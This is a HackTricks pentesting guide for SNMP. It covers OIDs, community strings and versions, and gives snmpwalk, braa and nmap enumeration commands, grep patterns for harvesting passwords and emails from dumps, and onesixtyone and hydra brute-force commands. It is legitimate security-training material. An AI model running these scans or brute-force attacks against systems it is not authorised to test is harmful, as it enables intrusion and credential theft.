mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-12 21:28:55 +00:00
322 lines
16 KiB
Markdown
322 lines
16 KiB
Markdown
|
# 161,162,10161,10162/udp - Pentesting SNMP
|
|||
|
|
|||
|
{% hint style="success" %}
|
|||
|
Learn & practice AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
|
|||
|
Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|||
|
|
|||
|
<details>
|
|||
|
|
|||
|
<summary>Support HackTricks</summary>
|
|||
|
|
|||
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
|
|||
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|||
|
|
|||
|
</details>
|
|||
|
{% endhint %}
|
|||
|
|
|||
|
<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
|||
|
|
|||
|
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
|||
|
|
|||
|
{% embed url="https://www.stmcyber.com/careers" %}
|
|||
|
|
|||
|
## Basic Information
|
|||
|
|
|||
|
**SNMP - Simple Network Management Protocol** is a protocol used to monitor different devices in the network (like routers, switches, printers, IoTs...).
|
|||
|
|
|||
|
```
|
|||
|
PORT STATE SERVICE REASON VERSION
|
|||
|
161/udp open snmp udp-response ttl 244 ciscoSystems SNMPv3 server (public)
|
|||
|
```
|
|||
|
|
|||
|
{% hint style="info" %}
|
|||
|
SNMP also uses the port **162/UDP** for **traps**. These are data **packets sent from the SNMP server to the client without being explicitly requested**.
|
|||
|
{% endhint %}
|
|||
|
|
|||
|
### MIB
|
|||
|
|
|||
|
To ensure that SNMP access works across manufacturers and with different client-server combinations, the **Management Information Base (MIB)** was created. MIB is an **independent format for storing device information**. A MIB is a **text** file in which all queryable **SNMP objects** of a device are listed in a **standardized** tree hierarchy. It contains at **least one `Object Identifier` (`OID`)**, which, in addition to the necessary **unique address** and a **name**, also provides information about the type, access rights, and a description of the respective object\
|
|||
|
MIB files are written in the `Abstract Syntax Notation One` (`ASN.1`) based ASCII text format. The **MIBs do not contain data**, but they explain **where to find which information** and what it looks like, which returns values for the specific OID, or which data type is used.
|
|||
|
|
|||
|
### OIDs
|
|||
|
|
|||
|
**Object Identifiers (OIDs)** play a crucial role. These unique identifiers are designed to manage objects within a **Management Information Base (MIB)**.
|
|||
|
|
|||
|
The highest levels of MIB object IDs, or OIDs, are allocated to diverse standard-setting organizations. It is within these top levels that the framework for global management practices and standards is established.
|
|||
|
|
|||
|
Furthermore, vendors are granted the liberty to establish private branches. Within these branches, they have the **autonomy to include managed objects pertinent to their own product lines**. This system ensures that there is a structured and organized method for identifying and managing a wide array of objects across different vendors and standards.
|
|||
|
|
|||
|
![](<../../.gitbook/assets/SNMP_OID_MIB_Tree (1).png>)
|
|||
|
|
|||
|
You can **navigate** through an **OID tree** from the web here: [http://www.oid-info.com/cgi-bin/display?tree=#focus](http://www.oid-info.com/cgi-bin/display?tree=#focus) or **see what a OID means** (like `1.3.6.1.2.1.1`) accessing [http://oid-info.com/get/1.3.6.1.2.1.1](http://oid-info.com/get/1.3.6.1.2.1.1).\
|
|||
|
There are some **well-known OIDs** like the ones inside [1.3.6.1.2.1](http://oid-info.com/get/1.3.6.1.2.1) that references MIB-2 defined Simple Network Management Protocol (SNMP) variables. And from the **OIDs pending from this one** you can obtain some interesting host data (system data, network data, processes data...)
|
|||
|
|
|||
|
### **OID Example**
|
|||
|
|
|||
|
[**Example from here**](https://www.netadmintools.com/snmp-mib-and-oids/):
|
|||
|
|
|||
|
**`1 . 3 . 6 . 1 . 4 . 1 . 1452 . 1 . 2 . 5 . 1 . 3. 21 . 1 . 4 . 7`**
|
|||
|
|
|||
|
Here is a breakdown of this address.
|
|||
|
|
|||
|
* 1 – this is called the ISO and it establishes that this is an OID. This is why all OIDs start with “1”
|
|||
|
* 3 – this is called ORG and it is used to specify the organization that built the device.
|
|||
|
* 6 – this is the dod or the Department of Defense which is the organization that established the Internet first.
|
|||
|
* 1 – this is the value of the internet to denote that all communications will happen through the Internet.
|
|||
|
* 4 – this value determines that this device is made by a private organization and not a government one.
|
|||
|
* 1 – this value denotes that the device is made by an enterprise or a business entity.
|
|||
|
|
|||
|
These first six values tend to be the same for all devices and they give you the basic information about them. This sequence of numbers will be the same for all OIDs, except when the device is made by the government.
|
|||
|
|
|||
|
Moving on to the next set of numbers.
|
|||
|
|
|||
|
* 1452 – gives the name of the organization that manufactured this device.
|
|||
|
* 1 – explains the type of device. In this case, it is an alarm clock.
|
|||
|
* 2 – determines that this device is a remote terminal unit.
|
|||
|
|
|||
|
The rest of the values give specific information about the device.
|
|||
|
|
|||
|
* 5 – denotes a discrete alarm point.
|
|||
|
* 1 – specific point in the device
|
|||
|
* 3 – port
|
|||
|
* 21 – address of the port
|
|||
|
* 1 – display for the port
|
|||
|
* 4 – point number
|
|||
|
* 7 – state of the point
|
|||
|
|
|||
|
### SNMP Versions
|
|||
|
|
|||
|
There are 2 important versions of SNMP:
|
|||
|
|
|||
|
* **SNMPv1**: Main one, it is still the most frequent, the **authentication is based on a string** (community string) that travels in **plain-text** (all the information travels in plain text). **Version 2 and 2c** send the **traffic in plain text** also and uses a **community string as authentication**.
|
|||
|
* **SNMPv3**: Uses a better **authentication** form and the information travels **encrypted** using (**dictionary attack** could be performed but would be much harder to find the correct creds than in SNMPv1 and v2).
|
|||
|
|
|||
|
### Community Strings
|
|||
|
|
|||
|
As mentioned before, **in order to access the information saved on the MIB you need to know the community string on versions 1 and 2/2c and the credentials on version 3.**\
|
|||
|
The are **2 types of community strings**:
|
|||
|
|
|||
|
* **`public`** mainly **read only** functions
|
|||
|
* **`private`** **Read/Write** in general
|
|||
|
|
|||
|
Note that **the writability of an OID depends on the community string used**, so **even** if you find that "**public**" is being used, you could be able to **write some values.** Also, there **may** exist objects which are **always "Read Only".**\
|
|||
|
If you try to **write** an object a **`noSuchName` or `readOnly` error** is received\*\*.\*\*
|
|||
|
|
|||
|
In versions 1 and 2/2c if you to use a **bad** community string the server wont **respond**. So, if it responds, a **valid community strings was used**.
|
|||
|
|
|||
|
## Ports
|
|||
|
|
|||
|
[From Wikipedia](https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol):
|
|||
|
|
|||
|
* The SNMP agent receives requests on UDP port **161**.
|
|||
|
* The manager receives notifications ([Traps](https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol#Trap) and [InformRequests](https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol#InformRequest)) on port **162**.
|
|||
|
* When used with [Transport Layer Security](https://en.wikipedia.org/wiki/Transport_Layer_Security) or [Datagram Transport Layer Security](https://en.wikipedia.org/wiki/Datagram_Transport_Layer_Security), requests are received on port **10161** and notifications are sent to port **10162**.
|
|||
|
|
|||
|
## Brute-Force Community String (v1 and v2c)
|
|||
|
|
|||
|
To **guess the community string** you could perform a dictionary attack. Check [here different ways to perform a brute-force attack against SNMP](../../generic-methodologies-and-resources/brute-force.md#snmp). A frequently used community string is `public`.
|
|||
|
|
|||
|
## Enumerating SNMP
|
|||
|
|
|||
|
It is recommanded to install the following to see whats does mean **each OID gathered** from the device:
|
|||
|
|
|||
|
```bash
|
|||
|
apt-get install snmp-mibs-downloader
|
|||
|
download-mibs
|
|||
|
# Finally comment the line saying "mibs :" in /etc/snmp/snmp.conf
|
|||
|
sudo vi /etc/snmp/snmp.conf
|
|||
|
```
|
|||
|
|
|||
|
If you know a valid community string, you can access the data using **SNMPWalk** or **SNMP-Check**:
|
|||
|
|
|||
|
```bash
|
|||
|
snmpbulkwalk -c [COMM_STRING] -v [VERSION] [IP] . #Don't forget the final dot
|
|||
|
snmpbulkwalk -c public -v2c 10.10.11.136 .
|
|||
|
|
|||
|
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP]
|
|||
|
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] 1.3.6.1.2.1.4.34.1.3 #Get IPv6, needed dec2hex
|
|||
|
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] NET-SNMP-EXTEND-MIB::nsExtendObjects #get extended
|
|||
|
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] .1 #Enum all
|
|||
|
|
|||
|
snmp-check [DIR_IP] -p [PORT] -c [COMM_STRING]
|
|||
|
|
|||
|
nmap --script "snmp* and not snmp-brute" <target>
|
|||
|
|
|||
|
braa <community string>@<IP>:.1.3.6.* #Bruteforce specific OID
|
|||
|
```
|
|||
|
|
|||
|
Thanks to extended queries (download-mibs), it is possible to enumerate even more about the system with the following command :
|
|||
|
|
|||
|
```bash
|
|||
|
snmpwalk -v X -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull
|
|||
|
```
|
|||
|
|
|||
|
**SNMP** has a lot of information about the host and things that you may find interesting are: **Network interfaces** (IPv4 and **IPv6** address), Usernames, Uptime, Server/OS version, and **processes**
|
|||
|
|
|||
|
**running** (may contain passwords)....
|
|||
|
|
|||
|
### **Dangerous Settings**
|
|||
|
|
|||
|
In the realm of network management, certain configurations and parameters are key to ensuring comprehensive monitoring and control.
|
|||
|
|
|||
|
### Access Settings
|
|||
|
|
|||
|
Two main settings enable access to the **full OID tree**, which is a crucial component in network management:
|
|||
|
|
|||
|
1. **`rwuser noauth`** is set to permit full access to the OID tree without the need for authentication. This setting is straightforward and allows for unrestricted access.
|
|||
|
2. For more specific control, access can be granted using:
|
|||
|
* **`rwcommunity`** for **IPv4** addresses, and
|
|||
|
* **`rwcommunity6`** for **IPv6** addresses.
|
|||
|
|
|||
|
Both commands require a **community string** and the relevant IP address, offering full access irrespective of the request's origin.
|
|||
|
|
|||
|
### SNMP Parameters for Microsoft Windows
|
|||
|
|
|||
|
A series of **Management Information Base (MIB) values** are utilized to monitor various aspects of a Windows system through SNMP:
|
|||
|
|
|||
|
* **System Processes**: Accessed via `1.3.6.1.2.1.25.1.6.0`, this parameter allows for the monitoring of active processes within the system.
|
|||
|
* **Running Programs**: The `1.3.6.1.2.1.25.4.2.1.2` value is designated for tracking currently running programs.
|
|||
|
* **Processes Path**: To determine where a process is running from, the `1.3.6.1.2.1.25.4.2.1.4` MIB value is used.
|
|||
|
* **Storage Units**: The monitoring of storage units is facilitated by `1.3.6.1.2.1.25.2.3.1.4`.
|
|||
|
* **Software Name**: To identify the software installed on a system, `1.3.6.1.2.1.25.6.3.1.2` is employed.
|
|||
|
* **User Accounts**: The `1.3.6.1.4.1.77.1.2.25` value allows for the tracking of user accounts.
|
|||
|
* **TCP Local Ports**: Finally, `1.3.6.1.2.1.6.13.1.3` is designated for monitoring TCP local ports, providing insight into active network connections.
|
|||
|
|
|||
|
### Cisco
|
|||
|
|
|||
|
Take a look to this page if you are Cisco equipment:
|
|||
|
|
|||
|
{% content-ref url="cisco-snmp.md" %}
|
|||
|
[cisco-snmp.md](cisco-snmp.md)
|
|||
|
{% endcontent-ref %}
|
|||
|
|
|||
|
## From SNMP to RCE
|
|||
|
|
|||
|
If you have the **string** that allows you to **write values** inside the SNMP service, you may be able to abuse it to **execute commands**:
|
|||
|
|
|||
|
{% content-ref url="snmp-rce.md" %}
|
|||
|
[snmp-rce.md](snmp-rce.md)
|
|||
|
{% endcontent-ref %}
|
|||
|
|
|||
|
## **Massive SNMP**
|
|||
|
|
|||
|
[Braa ](https://github.com/mteg/braa)is a mass SNMP scanner. The intended usage of such a tool is, of course, making SNMP queries – but unlike snmpwalk from net-snmp, it is able to query dozens or hundreds of hosts simultaneously, and in a single process. Thus, it consumes very few system resources and does the scanning VERY fast.
|
|||
|
|
|||
|
Braa implements its OWN snmp stack, so it does NOT need any SNMP libraries like net-snmp.
|
|||
|
|
|||
|
**Syntax:** braa \[Community-string]@\[IP of SNMP server]:\[iso id]
|
|||
|
|
|||
|
```bash
|
|||
|
braa ignite123@192.168.1.125:.1.3.6.*
|
|||
|
```
|
|||
|
|
|||
|
This can extract a lot MB of information that you cannot process manually.
|
|||
|
|
|||
|
So, lets look for the most interesting information (from [https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/](https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/)):
|
|||
|
|
|||
|
### **Devices**
|
|||
|
|
|||
|
The process begins with the extraction of **sysDesc MIB data** (1.3.6.1.2.1.1.1.0) from each file to identify the devices. This is accomplished through the use of a **grep command**:
|
|||
|
|
|||
|
```bash
|
|||
|
grep ".1.3.6.1.2.1.1.1.0" *.snmp
|
|||
|
```
|
|||
|
|
|||
|
### **Identify Private String**
|
|||
|
|
|||
|
A crucial step involves identifying the **private community string** used by organizations, particularly on Cisco IOS routers. This string enables the extraction of **running configurations** from routers. The identification often relies on analyzing SNMP Trap data for the word "trap" with a **grep command**:
|
|||
|
|
|||
|
```bash
|
|||
|
grep -i "trap" *.snmp
|
|||
|
```
|
|||
|
|
|||
|
### **Usernames/Passwords**
|
|||
|
|
|||
|
Logs stored within MIB tables are examined for **failed logon attempts**, which might accidentally include passwords entered as usernames. Keywords such as _fail_, _failed_, or _login_ are searched to find valuable data:
|
|||
|
|
|||
|
```bash
|
|||
|
grep -i "login\|fail" *.snmp
|
|||
|
```
|
|||
|
|
|||
|
### **Emails**
|
|||
|
|
|||
|
Finally, to extract **email addresses** from the data, a **grep command** with a regular expression is used, focusing on patterns that match email formats:
|
|||
|
|
|||
|
```bash
|
|||
|
grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" *.snmp
|
|||
|
```
|
|||
|
|
|||
|
## Modifying SNMP values
|
|||
|
|
|||
|
You can use _**NetScanTools**_ to **modify values**. You will need to know the **private string** in order to do so.
|
|||
|
|
|||
|
## Spoofing
|
|||
|
|
|||
|
If there is an ACL that only allows some IPs to query the SMNP service, you can spoof one of this addresses inside the UDP packet an sniff the traffic.
|
|||
|
|
|||
|
## Examine SNMP Configuration files
|
|||
|
|
|||
|
* snmp.conf
|
|||
|
* snmpd.conf
|
|||
|
* snmp-config.xml
|
|||
|
|
|||
|
<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
|||
|
|
|||
|
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
|||
|
|
|||
|
{% embed url="https://www.stmcyber.com/careers" %}
|
|||
|
|
|||
|
## HackTricks Automatic Commands
|
|||
|
|
|||
|
```
|
|||
|
Protocol_Name: SNMP #Protocol Abbreviation if there is one.
|
|||
|
Port_Number: 161 #Comma separated if there is more than one.
|
|||
|
Protocol_Description: Simple Network Managment Protocol #Protocol Abbreviation Spelled out
|
|||
|
|
|||
|
Entry_1:
|
|||
|
Name: Notes
|
|||
|
Description: Notes for SNMP
|
|||
|
Note: |
|
|||
|
SNMP - Simple Network Management Protocol is a protocol used to monitor different devices in the network (like routers, switches, printers, IoTs...).
|
|||
|
|
|||
|
https://book.hacktricks.xyz/pentesting/pentesting-snmp
|
|||
|
|
|||
|
Entry_2:
|
|||
|
Name: SNMP Check
|
|||
|
Description: Enumerate SNMP
|
|||
|
Command: snmp-check {IP}
|
|||
|
|
|||
|
Entry_3:
|
|||
|
Name: OneSixtyOne
|
|||
|
Description: Crack SNMP passwords
|
|||
|
Command: onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt {IP} -w 100
|
|||
|
|
|||
|
Entry_4:
|
|||
|
Name: Nmap
|
|||
|
Description: Nmap snmp (no brute)
|
|||
|
Command: nmap --script "snmp* and not snmp-brute" {IP}
|
|||
|
|
|||
|
Entry_5:
|
|||
|
Name: Hydra Brute Force
|
|||
|
Description: Need Nothing
|
|||
|
Command: hydra -P {Big_Passwordlist} -v {IP} snmp
|
|||
|
|
|||
|
|
|||
|
```
|
|||
|
|
|||
|
{% hint style="success" %}
|
|||
|
Learn & practice AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
|
|||
|
Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|||
|
|
|||
|
<details>
|
|||
|
|
|||
|
<summary>Support HackTricks</summary>
|
|||
|
|
|||
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
|
|||
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|||
|
|
|||
|
</details>
|
|||
|
{% endhint %}
|